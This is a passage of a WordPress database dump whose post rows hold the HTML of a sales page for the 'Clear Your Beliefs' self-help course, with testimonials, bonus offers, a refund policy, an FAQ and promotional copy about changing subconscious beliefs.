psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:33:11', '2014-06-19 06:33:11', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1037, 2, '2014-06-19 01:24:53', '2014-06-19 06:24:53', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> 